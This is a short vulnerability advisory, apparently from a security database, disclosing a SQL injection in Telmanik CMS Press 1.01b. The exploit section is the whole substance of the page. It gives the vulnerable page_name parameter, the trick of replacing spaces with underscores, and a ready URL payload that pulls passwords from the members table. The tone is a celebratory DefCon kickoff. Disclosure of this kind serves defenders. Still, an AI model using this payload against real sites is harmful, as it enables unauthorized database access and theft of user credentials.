Telmanik CMS Press 1.01b SQL Injection

2013.08.03
Credit: Anarchy Angel
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-89

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ [x] Type: SQL Injection [x] Vendor: www.telmanik.com [x] Script Name: Telmanik CMS Press [x] Script Version: 1.01b [x] Script DL: http://www.telmanik.com/download/Telmanik_CMS_Press/1.01_beta/telmanik_cms_press_v1.01_beta.zip [x] Author: Anarchy Angel [x] Mail : anarchy[at]dc414[dot]org ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Exploit: http://site.org/themes/pages.php?page_name=[SQLi] you have to formate you injection like so: union_select_row_from_table Replacing spaces with ?_?. Ex: http://site.org/themes/pages.php?page_name=union_select_password_from_members This is a special DefCon 21 kick off from me! See ya there [image: ;)] Special Tnx : dc414, lun0s, proge, sToRm, progenic, gny

References:

http://www.telmanik.com/download/Telmanik_CMS_Press/1.01_beta/telmanik_cms_press_v1.01_beta.zip


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2019, cxsecurity.com

 

Back to Top